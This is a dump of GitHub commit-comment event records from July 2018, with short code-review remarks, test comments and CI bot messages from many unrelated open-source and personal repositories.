{"id":"7972105668","type":"CommitCommentEvent","actor":{"login":"MarcosDenilson"},"repo":{"name":"MarcosDenilson/ParisBurguers"},"payload":{"comment":{"id":29724420,"position":null,"line":null,"path":null,"commit_id":"e0b2d496f29380ff92feb41b29570279b3a6c605","created_at":"2018-07-16T18:02:56Z","updated_at":"2018-07-16T18:02:56Z","author_association":"OWNER","body":"Subindo arquivo"}},"created_at":"2018-07-16T18:02:56Z"}
{"id":"7972105811","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"atomix/atomix"},"payload":{"comment":{"id":29724422,"position":41,"line":91,"path":"core/src/main/java/io/atomix/core/map/impl/CachingAsyncAtomicMap.java","commit_id":"c3d707064fffecea5709e4b161abb83021db9e0a","created_at":"2018-07-16T18:03:01Z","updated_at":"2018-07-16T18:03:01Z","author_association":"COLLABORATOR","body":"When removing guava should we be replacing this with a similar util or use Runnable::run?"}},"created_at":"2018-07-16T18:03:01Z"}
{"id":"7972108024","type":"CommitCommentEvent","actor":{"login":"eric-chen-ck"},"repo":{"name":"jcchavezs/zipkin-php"},"payload":{"comment":{"id":29724436,"position":34,"line":131,"path":"tests/Integration/Reporters/Http/CurlFactoryTest.php","commit_id":"08bd91f82cc667fedaecd7c0a5f500ae2400e61f","created_at":"2018-07-16T18:04:08Z","updated_at":"2018-07-16T18:04:08Z","author_association":"NONE","body":"Ok.\r\n\r\nIn terms of the order of the following 2 operations, I would probably recommend:\r\n```\r\n$output = ob_get_clean();\r\n$server->stop();\r\n``` \r\nBut we want to ensure both run even if the other fails, so I would suggest:\r\n```\r\ntry {\r\n    ...\r\n}\r\nfinally {\r\n    try {\r\n        $output = ob_get_clean();\r\n    }\r\n    finally {\r\n        $server->stop();\r\n    }\r\n}\r\n```"}},"created_at":"2018-07-16T18:04:08Z"}
{"id":"7972108865","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29724442,"position":null,"line":null,"path":null,"commit_id":"6227bb9220794571b982080fb3de37128cfae718","created_at":"2018-07-16T18:04:35Z","updated_at":"2018-07-16T18:04:35Z","author_association":"MEMBER","body":"@fichtner nice, although I'm not sure why the bogons fail in your case. resolving these should be similar to the rest of the rules. could it be that the proper rules are also in there, and these are just duplicated by https://github.com/opnsense/core/blob/master/src/etc/inc/filter.lib.inc#L312-L331 ?"}},"created_at":"2018-07-16T18:04:35Z"}
{"id":"7972109166","type":"CommitCommentEvent","actor":{"login":"tsdlau"},"repo":{"name":"bostonRitualClub/tightfit"},"payload":{"comment":{"id":29724443,"position":10,"line":74,"path":"app/views/cam_models/index.html.erb","commit_id":"d1b11fa236e3c3d3f710f3b489a2435b1af34bb9","created_at":"2018-07-16T18:04:46Z","updated_at":"2018-07-16T18:04:46Z","author_association":"CONTRIBUTOR","body":"dat github crash doe"}},"created_at":"2018-07-16T18:04:46Z"}
{"id":"7972109682","type":"CommitCommentEvent","actor":{"login":"jfriesen140"},"repo":{"name":"Apparatus-295/NetCoreAndNode"},"payload":{"comment":{"id":29724447,"position":5,"line":34,"path":"Controllers/ValuesController.cs","commit_id":"16e4c94f14f74e10ea193ccf251ae39eb2b360c6","created_at":"2018-07-16T18:05:01Z","updated_at":"2018-07-16T18:05:01Z","author_association":"NONE","body":"test code review"}},"created_at":"2018-07-16T18:05:01Z"}
{"id":"7972110472","type":"CommitCommentEvent","actor":{"login":"dianguyen95"},"repo":{"name":"monstercat/deon"},"payload":{"comment":{"id":29724452,"position":null,"line":null,"path":null,"commit_id":"42dc9a602b7e8dff301804a15da3f29848f070cb","created_at":"2018-07-16T18:05:26Z","updated_at":"2018-07-16T18:05:26Z","author_association":"CONTRIBUTOR","body":"so it doesn't apply on every page"}},"created_at":"2018-07-16T18:05:26Z"}
{"id":"7972110574","type":"CommitCommentEvent","actor":{"login":"kalbasit"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29724453,"position":null,"line":null,"path":null,"commit_id":"fd2448b2e6ec49808bb3a92e7ad99ac8318bb8e5","created_at":"2018-07-16T18:05:29Z","updated_at":"2018-07-16T18:05:29Z","author_association":"CONTRIBUTOR","body":"Oh, I was wondering why it's failing. Thanks @xeji!"}},"created_at":"2018-07-16T18:05:29Z"}
{"id":"7972112080","type":"CommitCommentEvent","actor":{"login":"TysonAndre"},"repo":{"name":"phan/phan"},"payload":{"comment":{"id":29724463,"position":4,"line":5080,"path":"src/Phan/Language/Internal/FunctionSignatureMap.php","commit_id":"c15d23f69eb295db4159eec2c520f11568f066ad","created_at":"2018-07-16T18:06:13Z","updated_at":"2018-07-16T18:06:13Z","author_association":"COLLABORATOR","body":"This change seems redundant. `implode'1` permits both `implode(['str1'], ',')` and `implode(['str1'])`\r\n\r\n```php\r\n// implode'1 corresponds to the following signature:\r\nfunction implode(array $pieces, $glue = '');\r\n```\r\n\r\n```\r\n 'implode\\'1' => ['string', 'pieces'=>'array', 'glue='=>'string'],\r\n```"}},"created_at":"2018-07-16T18:06:13Z"}
{"id":"7972113343","type":"CommitCommentEvent","actor":{"login":"jfriesen140"},"repo":{"name":"jfriesen140/NetCoreAndNode"},"payload":{"comment":{"id":29724470,"position":5,"line":34,"path":"Controllers/ValuesController.cs","commit_id":"16e4c94f14f74e10ea193ccf251ae39eb2b360c6","created_at":"2018-07-16T18:06:51Z","updated_at":"2018-07-16T18:06:51Z","author_association":"OWNER","body":"fdgdfgd"}},"created_at":"2018-07-16T18:06:51Z"}
{"id":"7972113894","type":"CommitCommentEvent","actor":{"login":"rpv-tomsk"},"repo":{"name":"collectd/collectd"},"payload":{"comment":{"id":29724474,"position":null,"line":null,"path":null,"commit_id":"1d6c7b046100cbae92df62aa7e50dcf101fa9867","created_at":"2018-07-16T18:07:09Z","updated_at":"2018-07-16T18:07:09Z","author_association":"CONTRIBUTOR","body":"An Issue was opened: https://github.com/collectd/collectd/issues/2859 \r\nThanks!"}},"created_at":"2018-07-16T18:07:09Z"}
{"id":"7972114222","type":"CommitCommentEvent","actor":{"login":"sharstream"},"repo":{"name":"sharstream/YoUGoal"},"payload":{"comment":{"id":29724475,"position":null,"line":null,"path":null,"commit_id":"e6512b147e1d6467a0b779f317216d3f49993cdf","created_at":"2018-07-16T18:07:19Z","updated_at":"2018-07-16T18:07:19Z","author_association":"OWNER","body":"<<<friendly reminder>>> Since github was off at this time I am pushing these changes to my branch again..."}},"created_at":"2018-07-16T18:07:19Z"}
{"id":"7972115371","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29724483,"position":38,"line":629,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"07a8f98a1aa1d1f76bc178b8068dbbd8e347cac4","created_at":"2018-07-16T18:07:54Z","updated_at":"2018-07-16T18:07:54Z","author_association":"COLLABORATOR","body":"It returns multiple articles so I don't think so."}},"created_at":"2018-07-16T18:07:54Z"}
{"id":"7972116661","type":"CommitCommentEvent","actor":{"login":"maxkfranz"},"repo":{"name":"PathwayCommons/factoid"},"payload":{"comment":{"id":29724485,"position":null,"line":null,"path":null,"commit_id":"217c813f1487978e197aeaaa249edfc62002c442","created_at":"2018-07-16T18:08:25Z","updated_at":"2018-07-16T18:08:25Z","author_association":"MEMBER","body":"Ref #354"}},"created_at":"2018-07-16T18:08:25Z"}
{"id":"7972116663","type":"CommitCommentEvent","actor":{"login":"shyamd"},"repo":{"name":"materialsproject/pymatgen"},"payload":{"comment":{"id":29724486,"position":null,"line":null,"path":null,"commit_id":"5031b4e055da3f30c296aae02b491083d3b1d093","created_at":"2018-07-16T18:08:25Z","updated_at":"2018-07-16T18:08:25Z","author_association":"CONTRIBUTOR","body":"We can also try and changing the Matplotlib settings in travis.yml:\r\nhttps://github.com/materialsproject/pymatgen/blob/dde1f43a9b15c381f5ea2bbac298ed0b0deb8b7b/.travis.yml#L11\r\n\r\nMaybe change that to PDF? It should be more robust since it will apply to all tests. "}},"created_at":"2018-07-16T18:08:25Z"}
{"id":"7972117076","type":"CommitCommentEvent","actor":{"login":"maxkfranz"},"repo":{"name":"PathwayCommons/factoid"},"payload":{"comment":{"id":29724488,"position":null,"line":null,"path":null,"commit_id":"7d50d70efc2044d02c46ed907d8b23a7611ba827","created_at":"2018-07-16T18:08:34Z","updated_at":"2018-07-16T18:08:34Z","author_association":"MEMBER","body":"Ref #354"}},"created_at":"2018-07-16T18:08:34Z"}
{"id":"7972118896","type":"CommitCommentEvent","actor":{"login":"jscho13"},"repo":{"name":"bostonRitualClub/tightfit"},"payload":{"comment":{"id":29724492,"position":20,"line":113,"path":"app/controllers/cam_models_controller.rb","commit_id":"d1b11fa236e3c3d3f710f3b489a2435b1af34bb9","created_at":"2018-07-16T18:09:24Z","updated_at":"2018-07-16T18:09:24Z","author_association":"MEMBER","body":"Yah I removed the ads and call the command when we hit 100k way simpler for now: https://github.com/bostonRitualClub/tightfit/commit/949c57038760a189d25238d703efc21a4631ad13"}},"created_at":"2018-07-16T18:09:24Z"}
{"id":"7972127728","type":"CommitCommentEvent","actor":{"login":"datadeveb"},"repo":{"name":"data-deveb/data-deveb.github.io"},"payload":{"comment":{"id":29724516,"position":null,"line":null,"path":null,"commit_id":"0a89988aee15726a17fd3b38a0c1824763c0f62b","created_at":"2018-07-16T18:13:45Z","updated_at":"2018-07-16T18:13:45Z","author_association":"COLLABORATOR","body":"a"}},"created_at":"2018-07-16T18:13:45Z"}
{"id":"7972130149","type":"CommitCommentEvent","actor":{"login":"NTaylorMullen"},"repo":{"name":"aspnet/Razor"},"payload":{"comment":{"id":29724525,"position":1,"line":1,"path":"test/Microsoft.AspNetCore.Razor.Test.Common/Language/Legacy/ParserTestBase.cs","commit_id":"ad2ee8ed631eeba80925b0e0b1ed022e0e46a0ef","created_at":"2018-07-16T18:14:57Z","updated_at":"2018-07-16T18:14:57Z","author_association":"MEMBER","body":"🔥 "}},"created_at":"2018-07-16T18:14:57Z"}
{"id":"7972130957","type":"CommitCommentEvent","actor":{"login":"j-f1"},"repo":{"name":"quintronsystems/font-awesome-java"},"payload":{"comment":{"id":29724531,"position":null,"line":null,"path":null,"commit_id":"1b9ff30d480a8ab8ec1ac627e038afae341858f3","created_at":"2018-07-16T18:15:19Z","updated_at":"2018-07-16T18:15:19Z","author_association":"NONE","body":"You might want to [delete this file from the repository’s history](https://help.github.com/articles/removing-sensitive-data-from-a-repository/) so it isn’t still available."}},"created_at":"2018-07-16T18:15:19Z"}
{"id":"7972134982","type":"CommitCommentEvent","actor":{"login":"kentico-michaelb"},"repo":{"name":"Enngage/kentico-cloud-js"},"payload":{"comment":{"id":29724546,"position":null,"line":null,"path":null,"commit_id":"6ee960179999d2c3b6b82c1c85d3477137a6036f","created_at":"2018-07-16T18:17:10Z","updated_at":"2018-07-16T18:17:10Z","author_association":"NONE","body":"Would it be possible to take this piece of documentation one step further and provide an example of the containsFilter applying to a Taxonomy term?  I have had another support conversation regarding this same topic. \r\n\r\nFor example after the elements.title, 'Warrior' example, something related to tax terms like:\r\n\r\ndeliveryClient.items<Movie>()\r\n  .type('movie')\r\n  .containsFilter('elements.genres', ['action'])\r\n  .getObservable()\r\n  .subscribe(response => console.log(response));"}},"created_at":"2018-07-16T18:17:10Z"}
{"id":"7972136822","type":"CommitCommentEvent","actor":{"login":"vincentsarago"},"repo":{"name":"gfw-api/lambda-tiler"},"payload":{"comment":{"id":29724549,"position":68,"line":28,"path":"app/handler.py","commit_id":"4a3aa58097a55b2190c8b5bfa7b344da18f4ffa4","created_at":"2018-07-16T18:18:00Z","updated_at":"2018-07-16T18:18:00Z","author_association":"NONE","body":"Hey @mappingvermont just noticing you could use `indexes=(1,2,3)` in the `main.tile` if you don't care about the 4th band. This will make the runtime faster"}},"created_at":"2018-07-16T18:18:00Z"}
{"id":"7972137654","type":"CommitCommentEvent","actor":{"login":"Sweet1022"},"repo":{"name":"Sweet1022/hello-world"},"payload":{"comment":{"id":29724551,"position":null,"line":null,"path":null,"commit_id":"e87a56294a42bc20f9c255f567afa5530ff5cb15","created_at":"2018-07-16T18:18:25Z","updated_at":"2018-07-16T18:18:25Z","author_association":"OWNER","body":"#Here it is.  My first on GitHub.  What about me?  Well, I'll tell ya:  I'm obviously a beginner at GitHub and it is yet to be seen my Level as a Python or Java or SQL or Perl programmer."}},"created_at":"2018-07-16T18:18:25Z"}
{"id":"7972137845","type":"CommitCommentEvent","actor":{"login":"adityak2920"},"repo":{"name":"adityak2920/Facial_Recognition"},"payload":{"comment":{"id":29724553,"position":null,"line":null,"path":null,"commit_id":"30d19ed5ee09eb7b0c97814f64a96a16b390737d","created_at":"2018-07-16T18:18:31Z","updated_at":"2018-07-16T18:18:31Z","author_association":"OWNER","body":"[![Binder](https://mybinder.org/badge.svg)](https://mybinder.org/v2/gh/adityak2920/Facial_Recognition/master)"}},"created_at":"2018-07-16T18:18:31Z"}
{"id":"7972139656","type":"CommitCommentEvent","actor":{"login":"vincentsarago"},"repo":{"name":"gfw-api/lambda-tiler"},"payload":{"comment":{"id":29724561,"position":68,"line":28,"path":"app/handler.py","commit_id":"4a3aa58097a55b2190c8b5bfa7b344da18f4ffa4","created_at":"2018-07-16T18:19:20Z","updated_at":"2018-07-16T18:19:20Z","author_association":"NONE","body":"All in fact you are not using `rio_tiler.main` so use `rgb=(1,2,3)`"}},"created_at":"2018-07-16T18:19:20Z"}
{"id":"7972140185","type":"CommitCommentEvent","actor":{"login":"adityak2920"},"repo":{"name":"adityak2920/Facial_Recognition"},"payload":{"comment":{"id":29724563,"position":2,"line":2,"path":"README.md","commit_id":"30d19ed5ee09eb7b0c97814f64a96a16b390737d","created_at":"2018-07-16T18:19:34Z","updated_at":"2018-07-16T18:19:34Z","author_association":"OWNER","body":"[![Binder](https://mybinder.org/badge.svg)](https://mybinder.org/v2/gh/adityak2920/Facial_Recognition/master)\r\n"}},"created_at":"2018-07-16T18:19:34Z"}
{"id":"7972140597","type":"CommitCommentEvent","actor":{"login":"Mexicoder"},"repo":{"name":"Apparatus-295/NetCoreAndNode"},"payload":{"comment":{"id":29724565,"position":5,"line":30,"path":"Controllers/ValuesController.cs","commit_id":"43fe8d4871eca1076297b9f5307e9079b1222853","created_at":"2018-07-16T18:19:46Z","updated_at":"2018-07-16T18:19:46Z","author_association":"COLLABORATOR","body":"test comment\r\n"}},"created_at":"2018-07-16T18:19:46Z"}
{"id":"7972140985","type":"CommitCommentEvent","actor":{"login":"Mexicoder"},"repo":{"name":"Apparatus-295/NetCoreAndNode"},"payload":{"comment":{"id":29724566,"position":4,"line":30,"path":"Controllers/ValuesController.cs","commit_id":"43fe8d4871eca1076297b9f5307e9079b1222853","created_at":"2018-07-16T18:19:56Z","updated_at":"2018-07-16T18:19:56Z","author_association":"COLLABORATOR","body":"@jfriesen140 other comment"}},"created_at":"2018-07-16T18:19:56Z"}
{"id":"7972140999","type":"CommitCommentEvent","actor":{"login":"srinu55"},"repo":{"name":"srinu55/DEVOPS"},"payload":{"comment":{"id":29724567,"position":null,"line":null,"path":null,"commit_id":"a1b00b5fee9f18ac132cceaf4c2b8a55e6c5c361","created_at":"2018-07-16T18:19:57Z","updated_at":"2018-07-16T18:19:57Z","author_association":"OWNER","body":"git is success"}},"created_at":"2018-07-16T18:19:57Z"}
{"id":"7972141939","type":"CommitCommentEvent","actor":{"login":"MoritzJoekel"},"repo":{"name":"MoritzJoekel/DJF_LSP"},"payload":{"comment":{"id":29724569,"position":9,"line":8,"path":"DJF_LSP/Form1.vb","commit_id":"0ffa9dd34a578c50998c939d4ea1810bce6fd00b","created_at":"2018-07-16T18:20:22Z","updated_at":"2018-07-16T18:20:22Z","author_association":"OWNER","body":"Datenbank in XML"}},"created_at":"2018-07-16T18:20:22Z"}
{"id":"7972142700","type":"CommitCommentEvent","actor":{"login":"MoritzJoekel"},"repo":{"name":"MoritzJoekel/DJF_LSP"},"payload":{"comment":{"id":29724571,"position":14,"line":13,"path":"DJF_LSP/Form1.vb","commit_id":"0ffa9dd34a578c50998c939d4ea1810bce6fd00b","created_at":"2018-07-16T18:20:45Z","updated_at":"2018-07-16T18:20:45Z","author_association":"OWNER","body":"Datenbank aus XML lesen"}},"created_at":"2018-07-16T18:20:45Z"}
{"id":"7972142780","type":"CommitCommentEvent","actor":{"login":"Shatujitu"},"repo":{"name":"Shatujitu/Sample-Project"},"payload":{"comment":{"id":29724570,"position":null,"line":null,"path":null,"commit_id":"bf9bffbb20631d4ffa96d1456701fab6d7e1d410","created_at":"2018-07-16T18:20:45Z","updated_at":"2018-07-16T18:20:45Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-16T18:20:45Z"}
{"id":"7972148943","type":"CommitCommentEvent","actor":{"login":"cvalenzuela"},"repo":{"name":"cvalenzuela/Mappa"},"payload":{"comment":{"id":29724582,"position":14,"line":1067,"path":"dist/mappa.js","commit_id":"551e2c906f36dd67906f51fbd62ea7ed06336719","created_at":"2018-07-16T18:21:54Z","updated_at":"2018-07-16T18:21:54Z","author_association":"OWNER","body":"Thanks!, will take a look"}},"created_at":"2018-07-16T18:21:54Z"}
{"id":"7972151806","type":"CommitCommentEvent","actor":{"login":"spartam72"},"repo":{"name":"spartam72/openclasrooms"},"payload":{"comment":{"id":29724586,"position":null,"line":null,"path":null,"commit_id":"f4324ba560d1d14633eabd38f6552e55c35494c1","created_at":"2018-07-16T18:22:26Z","updated_at":"2018-07-16T18:22:26Z","author_association":"OWNER","body":"voici mon tatouage"}},"created_at":"2018-07-16T18:22:26Z"}
{"id":"7972154542","type":"CommitCommentEvent","actor":{"login":"lholden"},"repo":{"name":"actix/actix-web"},"payload":{"comment":{"id":29724590,"position":null,"line":null,"path":null,"commit_id":"5888f01317d30c1f98f90ad99f5c75078f24dfd4","created_at":"2018-07-16T18:22:56Z","updated_at":"2018-07-16T18:22:56Z","author_association":"NONE","body":"Thanks for this :)"}},"created_at":"2018-07-16T18:22:56Z"}
{"id":"7972156760","type":"CommitCommentEvent","actor":{"login":"georgehazan"},"repo":{"name":"miranda-ng/miranda-ng"},"payload":{"comment":{"id":29724593,"position":null,"line":null,"path":null,"commit_id":"fae29d175eefe37910e61e9a770cd9c2eed6d68d","created_at":"2018-07-16T18:23:22Z","updated_at":"2018-07-16T18:23:22Z","author_association":"MEMBER","body":"it really fixes #1493 :) github, what's happening"}},"created_at":"2018-07-16T18:23:22Z"}
{"id":"7972165347","type":"CommitCommentEvent","actor":{"login":"jinny7899"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29724608,"position":null,"line":null,"path":null,"commit_id":"8ed6f4f02965f2e555303811ad28d14b047f52d4","created_at":"2018-07-16T18:24:59Z","updated_at":"2018-07-16T18:24:59Z","author_association":"NONE","body":"Thx boss you the man\r\n"}},"created_at":"2018-07-16T18:24:59Z"}
{"id":"7972168490","type":"CommitCommentEvent","actor":{"login":"jscho13"},"repo":{"name":"bostonRitualClub/tightfit"},"payload":{"comment":{"id":29724613,"position":10,"line":74,"path":"app/views/cam_models/index.html.erb","commit_id":"d1b11fa236e3c3d3f710f3b489a2435b1af34bb9","created_at":"2018-07-16T18:25:35Z","updated_at":"2018-07-16T18:25:35Z","author_association":"MEMBER","body":"lol github is being broken"}},"created_at":"2018-07-16T18:25:35Z"}
{"id":"7972170463","type":"CommitCommentEvent","actor":{"login":"Untellable"},"repo":{"name":"gerrymandr/RunDMCMC"},"payload":{"comment":{"id":29724616,"position":null,"line":null,"path":null,"commit_id":"1af0579e066e9ee1b47539c3e7010e0ebaf77217","created_at":"2018-07-16T18:25:57Z","updated_at":"2018-07-16T18:25:57Z","author_association":"CONTRIBUTOR","body":"I was probably supposed to pull request this or something wasn't I. Sorry Robert.\r\nAnyways I tested it with the most recent version of chain and didn't have any problems so"}},"created_at":"2018-07-16T18:25:57Z"}
{"id":"7972174144","type":"CommitCommentEvent","actor":{"login":"ianbelanger79"},"repo":{"name":"mojoness/mojo-marketplace-wp-plugin"},"payload":{"comment":{"id":29724619,"position":null,"line":null,"path":null,"commit_id":"2c1b13eea9019165be2eb6efd948d6456ebdf1ee","created_at":"2018-07-16T18:26:40Z","updated_at":"2018-07-16T18:26:40Z","author_association":"NONE","body":"Tested with Coming Soon page activated. The notification email is still sent when a new post is published.  Investigating the code now, will post findings here."}},"created_at":"2018-07-16T18:26:40Z"}
{"id":"7972175893","type":"CommitCommentEvent","actor":{"login":"eb4x"},"repo":{"name":"CanonicalLtd/curtin"},"payload":{"comment":{"id":29724624,"position":null,"line":null,"path":null,"commit_id":"a909966f9c235282267024e86adf404dab83ccfe","created_at":"2018-07-16T18:26:59Z","updated_at":"2018-07-16T18:26:59Z","author_association":"NONE","body":"It very well could be, there's mentions of trying to fix this issue; https://www.spinics.net/lists/linux-mm/msg147100.html\r\n\r\nI also checked and verified that fallocate does indeed work on ext4. So maybe just xfs with this issue.\r\n\r\nI've filed a bug for this in https://bugs.launchpad.net/curtin/+bug/1781781 will update it with my findings shortly."}},"created_at":"2018-07-16T18:26:59Z"}
{"id":"7972176547","type":"CommitCommentEvent","actor":{"login":"janmejay"},"repo":{"name":"rsyslog/rsyslog"},"payload":{"comment":{"id":29724626,"position":null,"line":null,"path":null,"commit_id":"029a44c6d86a9d9471c0320f5d24893fd4e6aa85","created_at":"2018-07-16T18:27:08Z","updated_at":"2018-07-16T18:27:08Z","author_association":"MEMBER","body":"Change looks good to me."}},"created_at":"2018-07-16T18:27:08Z"}
{"id":"7972179249","type":"CommitCommentEvent","actor":{"login":"ivansg44"},"repo":{"name":"ivansg44/LexMapr"},"payload":{"comment":{"id":29724633,"position":null,"line":null,"path":null,"commit_id":"831ffa3838f49fceec8b88b3704657e64ac3b8a3","created_at":"2018-07-16T18:27:38Z","updated_at":"2018-07-16T18:27:38Z","author_association":"OWNER","body":"This was modified to add another tab--which makes the pattern of tabs in this output file more similar to others. This will allow us to have a single call for writing outputs to files, that works for all match scenarios."}},"created_at":"2018-07-16T18:27:38Z"}
{"id":"7972189289","type":"CommitCommentEvent","actor":{"login":"gavinr"},"repo":{"name":"Esri/node-arcgis"},"payload":{"comment":{"id":29724642,"position":null,"line":null,"path":null,"commit_id":"8b7796c6fa66cf7dba0735a9a58505a700ac43be","created_at":"2018-07-16T18:29:34Z","updated_at":"2018-07-16T18:29:34Z","author_association":"MEMBER","body":"@jgravois should this deprecation notice go on the main documentation gh-pages site too? If someone goes directly there they won't see this note: http://esri.github.io/node-arcgis/"}},"created_at":"2018-07-16T18:29:34Z"}
{"id":"7972190425","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29724645,"position":25,"line":40,"path":"test/Remittance.js","commit_id":"f4f2f3b5de8261cfe0b443f414c7e7b37055aae8","created_at":"2018-07-16T18:29:47Z","updated_at":"2018-07-16T18:29:47Z","author_association":"OWNER","body":"I am trying following test case and it is passing while giving me assertion error as well, but if i change the approach and add done, it is failing as expected. Appreciate your help:\r\n` it(\"[UT03] Send Remittance transaction of 50wei from alice to bob\", function (/done/) {\r\nlet instance;\r\nvar otp1 = web3.fromAscii(\"7745\");\r\nvar otp2 = web3.fromAscii(\"8291\");\r\nvar payID = web3.fromAscii(\"00001\");\r\n    remittanceCont.then(_instance => {\r\n        // Get alice and bob's balances\r\n        instance = _instance;            \r\n        return web3.eth.getBalancePromise(instance.address)\r\n    }).then(_contractBalance => {\r\n        contractBalance = _contractBalance;\r\n        return instance.hashHelper.call(bobAccount, otp1, otp2, payID);\r\n    }).then(puzzle => {\r\n        return instance.sendRemitance(puzzle, bobAccount, { from: aliceAccount, value: 400 })\r\n    }).then(txHash => {\r\n        return web3.eth.getBalancePromise(instance.address)\r\n    }).then(newContBalance => {            \r\n        assert(newContBalance.minus(contractBalance).toString(10) >= 500, \"[UT003] Invalid balance\");\r\n       /* done(); */           \r\n    })/*.catch(done)*/;`"}},"created_at":"2018-07-16T18:29:47Z"}
{"id":"7972191146","type":"CommitCommentEvent","actor":{"login":"svip"},"repo":{"name":"diku-dk/openbanko"},"payload":{"comment":{"id":29724647,"position":null,"line":null,"path":null,"commit_id":"9b0fd0526eceead437ca8af22db35682dbba0abb","created_at":"2018-07-16T18:29:56Z","updated_at":"2018-07-16T18:29:56Z","author_association":"COLLABORATOR","body":"Vi hørte dig første gang."}},"created_at":"2018-07-16T18:29:56Z"}
{"id":"7972196871","type":"CommitCommentEvent","actor":{"login":"iainmcgin"},"repo":{"name":"hnljp/AppAuth-Android"},"payload":{"comment":{"id":29724665,"position":13,"line":88,"path":"library/java/net/openid/appauth/browser/BrowserSelector.java","commit_id":"b7a62fdec755cc163017f20c9715eaaebe59c5ac","created_at":"2018-07-16T18:31:01Z","updated_at":"2018-07-16T18:31:01Z","author_association":"NONE","body":"It is my understanding that queryIntentActivities should return an ordered list of activities from \"best to worst\" (see [documentation](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/BrowserSelector.java#L85)), and specifically states that the first entry would match what resolveActivity would return. As such, the existing could _should_ already respect the user's choice, if that is compatible with the browser matcher supplied by the app. Is that not the case?"}},"created_at":"2018-07-16T18:31:01Z"}
{"id":"7972212088","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29724693,"position":null,"line":null,"path":null,"commit_id":"3743d71dbc122b69c17b46060d1ca6311362e1c9","created_at":"2018-07-16T18:34:00Z","updated_at":"2018-07-16T18:34:00Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-383](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-383).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-383-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T18:34:00Z"}
{"id":"7972220361","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29724709,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-16T18:35:34Z","updated_at":"2018-07-16T18:35:34Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-16T18:35:34Z"}
{"id":"7972238576","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29724741,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-16T18:39:06Z","updated_at":"2018-07-16T18:39:06Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-16T18:39:06Z"}
{"id":"7972241407","type":"CommitCommentEvent","actor":{"login":"gazoo74"},"repo":{"name":"savoirfairelinux/cukinia"},"payload":{"comment":{"id":29724742,"position":null,"line":null,"path":null,"commit_id":"91fd724e1e5e2a71020a509ae0552f59eae23a6c","created_at":"2018-07-16T18:39:36Z","updated_at":"2018-07-16T18:39:36Z","author_association":"CONTRIBUTOR","body":"You were right, this shell string expansion is not a part of sh.\r\n\r\nHowever it is supported by bash, zsh and busybox shells.\r\n\r\nI don't really like spawning an `echo|cut` to get the first 15 characters when an alternative is possible using shell features. \r\n\r\nEven if this feature is not available in pure `/bin/sh`,  I think we should stick to the solution using the string expansion because we already use a none pure `sh` feature (`local` keyword to declare local variables)."}},"created_at":"2018-07-16T18:39:36Z"}
{"id":"7972247810","type":"CommitCommentEvent","actor":{"login":"palmerj"},"repo":{"name":"renesugar/sqlines"},"payload":{"comment":{"id":29724756,"position":null,"line":null,"path":null,"commit_id":"729305da6f302ead65c6598a88281c969ad19062","created_at":"2018-07-16T18:40:51Z","updated_at":"2018-07-16T18:40:51Z","author_association":"NONE","body":"Thanks for applying this @strk "}},"created_at":"2018-07-16T18:40:51Z"}
